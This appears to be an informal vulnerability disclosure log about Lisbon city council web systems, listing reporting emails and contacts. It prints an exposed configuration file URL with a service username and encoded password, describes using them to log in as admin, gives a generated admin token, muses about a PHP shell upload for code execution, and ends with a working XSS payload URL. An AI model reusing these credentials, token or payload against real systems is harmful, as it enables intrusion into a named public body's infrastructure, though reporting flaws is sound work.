15/3/2019 - First warning email sent to helpdesk@cm-lisboa.pt and infosite@cm-lisboa.pt

15/3/2019 - Made a phone call and talked to Josť Fernandes

15/3/2019 - Reported to suporte.web@cm-lisboa.pt, josť.fernandes@cm-lisboa.pt, jose.fernandes@cm-lisboa.pt

not sure if the correct email had an accent in the "e" or not, so i sent to both xD

.

in the page:

http://lxi.cm-lisboa.pt/lxi/config/Backup_04_08_2016/config.freguesia.xml

.

If you check the source code, there is a line with:

<ArcGISSecurity url="https://digc.cm-lisboa.pt/DIGC/tokens" username="app_wsgeo" password="R3A4OTYhaHM=" expiration="1440" />

.

.

login page took a second to find:

https://gis.cm-lisboa.pt/arcgis/rest/login

.

tried, and guess what? succefully login as the admin.

I didn't understood what it was exacly but i got to create a administration token that granted me admin priviledges on the files without havint to login every single time. Should have invested more time in it before reporting it, maybe try to get rce via php shell upload or something.

.

https://gis.cm-lisboa.pt/arcgis/tokens/generateToken

.

Token:

Uu1dMq6OiDiXV-YYiSmHOHfE1lmjtv7M8JFEFt2l0oBHBDbR59PwM3C4QZwnpOiM

.

Oh and the xss:

http://atendimentovirtual.cm-lisboa.pt/CMLMensagem.aspx?msg=<Image SrcSet=K */; OnError=confirm'1'//>